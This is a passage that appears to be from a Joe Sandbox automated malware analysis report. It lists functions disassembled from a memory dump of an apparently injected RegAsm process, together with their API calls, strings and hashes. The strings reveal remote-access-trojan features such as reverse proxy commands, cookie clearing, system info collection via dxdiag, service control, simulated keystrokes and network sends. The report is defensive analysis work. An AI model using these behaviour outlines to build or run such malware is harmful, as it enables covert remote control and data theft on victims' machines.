                                                                                              • __alloca_probe_16.LIBCMT ref: 0043CCA9
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0043CE68,00000001,00000001,36E85006,?,?,?), ref: 0043CCF7
                                                                                              • __alloca_probe_16.LIBCMT ref: 0043CD8E
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,36E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CDF1
                                                                                              • __freea.LIBCMT ref: 0043CDFE
                                                                                                • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                                                                              • __freea.LIBCMT ref: 0043CE07
                                                                                              • __freea.LIBCMT ref: 0043CE2C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                              • String ID: JnC
                                                                                              • API String ID: 3864826663-2531755783
                                                                                              • Opcode ID: f940c7817ddd6f836c54eefa34e2d49066d55026533aec00279bddeea0434e40
                                                                                              • Instruction ID: 16551e4f37cd50cf7fbfb2aa30d37855c537b24eff3af83edd6829f607421f63
                                                                                              • Opcode Fuzzy Hash: f940c7817ddd6f836c54eefa34e2d49066d55026533aec00279bddeea0434e40
                                                                                              • Instruction Fuzzy Hash: CF51E772600216ABEB258F65CCC2EBF7BA9EB48754F15562AFC05E6240DB38DC50C798
                                                                                              Function 004032EE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEvent.KERNEL32(?,?), ref: 0040330D
                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004033BD
                                                                                              • TranslateMessage.USER32(?), ref: 004033CC
                                                                                              • DispatchMessageA.USER32(?), ref: 004033D7
                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00467CF0), ref: 0040348F
                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 004034C7
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                              • API String ID: 2956720200-749203953
                                                                                              • Opcode ID: f509bd7164c746319cd36665601198b893aec81501ad93ddea78b5d8a0b4536f
                                                                                              • Instruction ID: d860b0a56e94f76641ef76a8e7973dae8c749e614e4092a13e3eb52c91ae7d72
                                                                                              • Opcode Fuzzy Hash: f509bd7164c746319cd36665601198b893aec81501ad93ddea78b5d8a0b4536f
                                                                                              • Instruction Fuzzy Hash: 3F41C3326043009BCB00BF76DD9A86F7BA9AB85704F00053EF906A71D1EE7CDA09C75A
                                                                                              Function 0043C520 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0043C534
                                                                                                • Part of subcall function 0043BEB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000), ref: 0043BECB
                                                                                                • Part of subcall function 0043BEB5: GetLastError.KERNEL32(00000000,?,00442E80,00000000,00000000,00000000,00000000,?,00443124,00000000,00000007,00000000,?,0044366F,00000000,00000000), ref: 0043BEDD
                                                                                              • _free.LIBCMT ref: 0043C540
                                                                                              • _free.LIBCMT ref: 0043C54B
                                                                                              • _free.LIBCMT ref: 0043C556
                                                                                              • _free.LIBCMT ref: 0043C561
                                                                                              • _free.LIBCMT ref: 0043C56C
                                                                                              • _free.LIBCMT ref: 0043C577
                                                                                              • _free.LIBCMT ref: 0043C582
                                                                                              • _free.LIBCMT ref: 0043C58D
                                                                                              • _free.LIBCMT ref: 0043C59B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 6349429f7da4dd04bd671fcc7f1dcaceb8753db72f2eaaffcae1a764faca52b2
                                                                                              • Instruction ID: c50bc2256fd40bb6b8c60e6ce880829711fb0bf02a5bbaa2345148bc22db0d7c
                                                                                              • Opcode Fuzzy Hash: 6349429f7da4dd04bd671fcc7f1dcaceb8753db72f2eaaffcae1a764faca52b2
                                                                                              • Instruction Fuzzy Hash: D211A776504108BFCB11EF59C892DDD3BA5EF08354F4150AAFB188B222DB35DA509FC8
                                                                                              Function 0040E5BB Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 164COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 65535$udp
                                                                                              • API String ID: 0-1267037602
                                                                                              • Opcode ID: 392f821c8fdb78c16ca5c60518ad7c8d75f9996d43e8d60c91428dcb4e3f1822
                                                                                              • Instruction ID: 84486ce2f1bb3f426333e4d3ad8243f8e990da5f3cf8287c7bce91a3dc9f0a7e
                                                                                              • Opcode Fuzzy Hash: 392f821c8fdb78c16ca5c60518ad7c8d75f9996d43e8d60c91428dcb4e3f1822
                                                                                              • Instruction Fuzzy Hash: EE51E335600205ABDB248F2AD809BBB3764AB45340F088C7BEC45A73D1E73ECD618A69
                                                                                              Function 004499C4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044A50F), ref: 004499E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DecodePointer
                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                              • API String ID: 3527080286-3064271455
                                                                                              • Opcode ID: abac6ed4de59e9d36f3893022c793c30d9b27768f13e93e51af2ea34c8abeae1
                                                                                              • Instruction ID: 110063cd0ce05d1060d43825b6a991279bdf802adc29d45c0d9515e70b7eb71e
                                                                                              • Opcode Fuzzy Hash: abac6ed4de59e9d36f3893022c793c30d9b27768f13e93e51af2ea34c8abeae1
                                                                                              • Instruction Fuzzy Hash: F751AF7090054ACBEF10DF68E94C4AEBBB0FB49315F60418BD880B7255CB79AD28EB1D
                                                                                              Function 00404E08 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406B5E: char_traits.LIBCPMT ref: 00406B79
                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00467C58,00459450,00000000,?,0040547E,00000000), ref: 00404E61
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,~T@,?,0040547E,00000000,?,?,0000000A,00000000), ref: 00404EA9
                                                                                              • CloseHandle.KERNEL32(00000000,?,0040547E,00000000,?,?,0000000A,00000000), ref: 00404EE3
                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00404EFB
                                                                                              • CloseHandle.KERNEL32(?,00000057,?,00000008,?,?,?,?,?,?,?,?,00000000), ref: 00404F1F
                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404F2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                                                                              • String ID: .part$~T@
                                                                                              • API String ID: 820096542-3190281576
                                                                                              • Opcode ID: 3b7bb03e7171406c54650a712e0f1743b795b2b065571ff22ad1ea35b0f2dae9
                                                                                              • Instruction ID: 7c0ed4d063a9e04155bbcfc9f8ad653c8c905adfc315915fd9f293c083df040d
                                                                                              • Opcode Fuzzy Hash: 3b7bb03e7171406c54650a712e0f1743b795b2b065571ff22ad1ea35b0f2dae9
                                                                                              • Instruction Fuzzy Hash: 54315EB5D00219ABCB04EFA5DD468EEB778FB44315F1085BAFA01B7190DB746E44CB98
                                                                                              Function 00410870 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00409474: char_traits.LIBCPMT ref: 00409484
                                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004108D0
                                                                                                • Part of subcall function 004149E0: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000,00000000,00000000,?,004108FA), ref: 004149FD
                                                                                              • Sleep.KERNEL32(00000064), ref: 004108FC
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 0041092C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                              • API String ID: 2701014334-2001430897
                                                                                              • Opcode ID: feff885c89399373f3c4a0b1e7d0616cbdad02ffb257a520dd5bf478f388978d
                                                                                              • Instruction ID: e682aa32545da1075197413550dedd9039f207d5310d298ab226810ec4c53ad6
                                                                                              • Opcode Fuzzy Hash: feff885c89399373f3c4a0b1e7d0616cbdad02ffb257a520dd5bf478f388978d
                                                                                              • Instruction Fuzzy Hash: 0A314F719101189ADB08FBA1DC92EEE7724AF50705F40017FF506770D2EE785E8ACA5D
                                                                                              Function 0044048C Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d18bbd428483c74bce51ca1012cfe0dcc70ce8969ddd0aa423389588925d3c4f
                                                                                              • Instruction ID: 47e32140ea42008b6e2fbe39e058ee49646603e651697782d258c77751b7765d
                                                                                              • Opcode Fuzzy Hash: d18bbd428483c74bce51ca1012cfe0dcc70ce8969ddd0aa423389588925d3c4f
                                                                                              • Instruction Fuzzy Hash: 60C1FA70E042459FEF11DFA8D841BAEBBB0BF4D310F14419AEA14A7392C7789951CF69
                                                                                              Function 004470F5 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004473CE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 004471A1
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 00447224
                                                                                              • __alloca_probe_16.LIBCMT ref: 0044725C
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004473CE,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 004472B7
                                                                                              • __alloca_probe_16.LIBCMT ref: 00447306
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 004472CE
                                                                                                • Part of subcall function 0043B5D9: RtlAllocateHeap.NTDLL(00000000,0042CBD9,?,?,0042E317,?,?,5.1.3 Light,?,?,004095E3,0042CBD9,?,?,?,?), ref: 0043B60B
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004473CE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044734A
                                                                                              • __freea.LIBCMT ref: 00447375
                                                                                              • __freea.LIBCMT ref: 00447381
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                              • String ID:
                                                                                              • API String ID: 201697637-0
                                                                                              • Opcode ID: 46c7a438ddb99d1cc0e511bb71b04e1777c4619828f97b31567a45340c70d4bb
                                                                                              • Instruction ID: 0a2115d0f49871cf642610963fb2ef61daaf79bca83d118575b9579562c159e9
                                                                                              • Opcode Fuzzy Hash: 46c7a438ddb99d1cc0e511bb71b04e1777c4619828f97b31567a45340c70d4bb
                                                                                              • Instruction Fuzzy Hash: 0991B271E082169AEB208FA5CC81EEF7BB5AB09354F14465BED01E6341D73CDC42D7A8
                                                                                              Function 0043A847 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0043C614: GetLastError.KERNEL32(?,00000000,0043783C,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C618
                                                                                                • Part of subcall function 0043C614: _free.LIBCMT ref: 0043C64B
                                                                                                • Part of subcall function 0043C614: SetLastError.KERNEL32(00000000,?,00413F8F,-004697EC,?,?,?,?,?,004088E8,.vbs), ref: 0043C68C
                                                                                                • Part of subcall function 0043C614: _abort.LIBCMT ref: 0043C692
                                                                                              • _memcmp.LIBVCRUNTIME ref: 0043AAF1
                                                                                              • _free.LIBCMT ref: 0043AB62
                                                                                              • _free.LIBCMT ref: 0043AB7B
                                                                                              • _free.LIBCMT ref: 0043ABAD
                                                                                              • _free.LIBCMT ref: 0043ABB6
                                                                                              • _free.LIBCMT ref: 0043ABC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                              • String ID: C
                                                                                              • API String ID: 1679612858-1037565863
                                                                                              • Opcode ID: 4bd2d0aa180a844c3bfeb63cbfd115b52fffeb547571d82c9d5068b51f159042
                                                                                              • Instruction ID: c4661d0a74ae8308ead59343ecbb51613a8cf0527b1561a261068459944c83cc
                                                                                              • Opcode Fuzzy Hash: 4bd2d0aa180a844c3bfeb63cbfd115b52fffeb547571d82c9d5068b51f159042
                                                                                              • Instruction Fuzzy Hash: 0BB15975A012199FDB24DF18C884BAEB7B5FF48304F1045AEE949A7350E734AE90CF85
                                                                                              Function 0040E33B Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: tcp$udp
                                                                                              • API String ID: 0-3725065008
                                                                                              • Opcode ID: 4ea1a0624809739be7cb6ad35bad68ba6a1498aee19020f9739b75e3dd0165ed
                                                                                              • Instruction ID: 2cfa6809cb724154de7c5257ff097518599a902fbcec9cb31fa9a61e5e6da04f
                                                                                              • Opcode Fuzzy Hash: 4ea1a0624809739be7cb6ad35bad68ba6a1498aee19020f9739b75e3dd0165ed
                                                                                              • Instruction Fuzzy Hash: 54817E70A00216EBDF248F96C94566A7BB1EF04315F14887BE805B73D0E778CD61DB99
                                                                                              Function 004110EE Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041133B: __EH_prolog.LIBCMT ref: 00411340
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00459594), ref: 004111EB
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004111F4
                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00411203
                                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004111B7
                                                                                                • Part of subcall function 004018E7: send.WS2_32(?,00000000,00000000,00000000), ref: 0040195A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                              • String ID: <$@$Temp
                                                                                              • API String ID: 1704390241-1032778388
                                                                                              • Opcode ID: 4020ca899df10b69a3cb7db48745e2cbed4258c36e973762b8bffe8ea618c978
                                                                                              • Instruction ID: f7fd7360526dce7b80c1252073eef177887262dc2d48c10ab8877ccdce07747f
                                                                                              • Opcode Fuzzy Hash: 4020ca899df10b69a3cb7db48745e2cbed4258c36e973762b8bffe8ea618c978
                                                                                              • Instruction Fuzzy Hash: 3B41B431A002099BDB15FB61DD5AAEE7734AF10305F40417EF606760E2EF781E89CB99
                                                                                              Function 004131C6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,00412D7B,00000000), ref: 004131D5
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,00412D7B,00000000), ref: 004131E9
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 004131F6
                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00412D7B,00000000), ref: 00413205
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 00413217
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00412D7B,00000000), ref: 0041321A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                              • String ID: {-A
                                                                                              • API String ID: 221034970-2249487690
                                                                                              • Opcode ID: 401f4a1600f5178c27bfe92e88e268514c7c3588f5d37f863d5ae499bed1e7ef
                                                                                              • Instruction ID: 7e647667e6c08bc6e9fb8e637e579d569d58eb8f592d23d6fbd5c62d0da24c2c
                                                                                              • Opcode Fuzzy Hash: 401f4a1600f5178c27bfe92e88e268514c7c3588f5d37f863d5ae499bed1e7ef
                                                                                              • Instruction Fuzzy Hash: C6F046359012187BD3206F659C4AEBF3B6CCB86356F000026FE0893141DF388E4685F8
                                                                                              Function 00412851 Relevance: 12.1, APIs: 8, Instructions: 118keyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000003,00000004), ref: 00412897
                                                                                              • SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128BB
                                                                                              • SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128DE
                                                                                              • SendInput.USER32(00000001,00000003,0000001C,00000000,00000000,00000000,00000003,00000004), ref: 004128FB
                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 0041291A
                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 0041293C
                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 0041295C
                                                                                              • SendInput.USER32(00000001,?), ref: 0041297D
                                                                                                • Part of subcall function 00412844: MapVirtualKeyA.USER32(00000000,00000000), ref: 0041284A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InputSend$Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 1167301434-0
                                                                                              • Opcode ID: 4c57448a38bb73011fe1d8cbfc53ccb25ff581db71d2bf486c24c5fff60de6aa
                                                                                              • Instruction ID: 24ca5d00d02f7653e18acf6bc68dbc8fd38b51cab6d69bb73ca3533017ab6641
                                                                                              • Opcode Fuzzy Hash: 4c57448a38bb73011fe1d8cbfc53ccb25ff581db71d2bf486c24c5fff60de6aa
                                                                                              • Instruction Fuzzy Hash: 8D318771D4034CA6EB14EBE5DD01FEFBBB89F59700F00011BE500B7191D6F95A558BA5
                                                                                              Function 0040C3EC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 152COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Event
                                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                              • API String ID: 4201588131-168337528
                                                                                              • Opcode ID: 784d744d0aa7a66909bcf1d0778d565ced12278adbb9dc1867596fee42cf8144
                                                                                              • Instruction ID: 4c107d70a221628ff284c34145cd556a99705f34e20cdd27ed2f6698d2395ea7
                                                                                              • Opcode Fuzzy Hash: 784d744d0aa7a66909bcf1d0778d565ced12278adbb9dc1867596fee42cf8144
                                                                                              • Instruction Fuzzy Hash: 4C418131A147109BC604BB35CD5AA6E3A95AB41714F40463FF905BB2D2EFBC9A09C78F
                                                                                              Function 0043DC80 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0043E3F5,0044A1E5,00000000,00000000,00000000,00000000,00000000), ref: 0043DCC2
                                                                                              • __fassign.LIBCMT ref: 0043DD3D
                                                                                              • __fassign.LIBCMT ref: 0043DD58
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0043DD7E
                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,0043E3F5,00000000,?,?,?,?,?,?,?,?,?,0043E3F5,0044A1E5), ref: 0043DD9D
                                                                                              • WriteFile.KERNEL32(?,0044A1E5,00000001,0043E3F5,00000000,?,?,?,?,?,?,?,?,?,0043E3F5,0044A1E5), ref: 0043DDD6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 35079569acf6452906d3e5629254c2c9cd3208af80c92755be3db5b1c4d45b1b
                                                                                              • Instruction ID: 1191330dd9651e550a9c57302bd25a2e4a4b496a4be768e30e66c30c5805dab2
                                                                                              • Opcode Fuzzy Hash: 35079569acf6452906d3e5629254c2c9cd3208af80c92755be3db5b1c4d45b1b
                                                                                              • Instruction Fuzzy Hash: 8B51B170E00609AFCB10CFA8E881AEEBBB9FF1D300F14512AE555E7291D7749951CB69
                                                                                              Function 004083D5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040D033: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,00000000), ref: 0040D057
                                                                                                • Part of subcall function 0040D033: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 0040D074
                                                                                                • Part of subcall function 0040D033: RegCloseKey.KERNEL32(00000000), ref: 0040D07F
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000,?,?,00000000), ref: 00408457
                                                                                              • PathFileExistsA.SHLWAPI(?,?,?,00000000), ref: 00408464
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                              • API String ID: 1133728706-4073444585
                                                                                              • Opcode ID: 212d0c3c002ae2edef2713a16cc0edc5256dee1b3f4577f796eb300dcf838cc7
                                                                                              • Instruction ID: 48a5cd8e34f4168e4ceb4a97fd5a88dfb481768987e4111ae43b07c44258e77f
                                                                                              • Opcode Fuzzy Hash: 212d0c3c002ae2edef2713a16cc0edc5256dee1b3f4577f796eb300dcf838cc7
                                                                                              • Instruction Fuzzy Hash: 1021C370A0021596CB04FBB1CD5BDEE7728AF55309F80003FB942772C2EE7C5949C699
                                                                                              Function 0044A05D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ac892822ad79c21a418106d2abc791ff60adf2d6927d3eb98dd4cd0fe3a8f10
                                                                                              • Instruction ID: 3624dff07b2ed831ebec2a5ad87dd854ecd10989a5fe549f38fdbb033019db15
                                                                                              • Opcode Fuzzy Hash: 4ac892822ad79c21a418106d2abc791ff60adf2d6927d3eb98dd4cd0fe3a8f10
                                                                                              • Instruction Fuzzy Hash: 8B1127725041147BEB206FB69C0996F7A6CEBCA775F10066FF825D2291DA38C810866A
                                                                                              Function 0040BD3E Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040BD4B
